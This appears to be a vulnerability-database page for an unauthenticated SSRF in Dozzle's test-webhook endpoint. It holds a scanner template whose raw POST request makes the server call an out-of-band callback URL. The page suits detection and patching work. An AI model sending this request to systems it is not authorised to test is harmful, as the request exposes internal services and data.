/Vulnerability Library

Dozzle - Server Side Request Forgery

CVE-2026-45298
Early Release

Description

Dozzle prior to 10.5.2 contains a server-side request forgery caused by unauthenticated access to POST /api/notifications/test-webhook forwarding attacker-controlled URLs, letting remote attackers send arbitrary HTTP POST requests and receive response data, exploit requires no authentication.

Severity

High

CVSS Score

8.6

Exploit Probability

0%

Published Date

June 9, 2026

Template Author

theamanrawat

CVE-2026-45298.yaml
id: CVE-2026-45298

info:
  name: Dozzle - Server Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    Dozzle prior to 10.5.2 contains a server-side request forgery caused by unauthenticated access to POST /api/notifications/test-webhook forwarding attacker-controlled URLs, letting remote attackers send arbitrary HTTP POST requests and receive response data, exploit requires no authentication.
  impact: |
    Remote attackers can send arbitrary HTTP POST requests and retrieve response data, potentially exposing internal services or sensitive information.
  remediation: |
    Update to version 10.5.2 or later.
  reference:
    - https://github.com/amir20/dozzle/security/advisories/GHSA-3v9w-6365-9w54
    - https://nvd.nist.gov/vuln/detail/CVE-2026-45298
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2026-45298
    epss-score: 0.00026
    epss-percentile: 0.0792
    cwe-id: CWE-918
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,ssrf,dozzle

http:
  - raw:
      - |
        POST /api/notifications/test-webhook HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"url":"http://{{interactsh-url}}","headers":{}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - 'http'

      - type: word
        part: body
        words:
          - '"statusCode":200'

      - type: status
        status:
          - 200
# digest: 490a00463044022004ba0ba368437a40e7336f99aa878ab89abe9a1443e8777d0e897f25559df2410220279e6e3e4943091d4c8e0ef6806c84c6c0f5970a67148a9538a0bd90c438504f:922c64590222798bb761d5b6d8e72950
8.6Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
CVE ID:
cve-2026-45298
CWE ID:
cwe-918

References

https://github.com/amir20/dozzle/security/advisories/GHSA-3v9w-6365-9w54https://nvd.nist.gov/vuln/detail/CVE-2026-45298

Remediation Steps

Update to version 10.5.2 or later.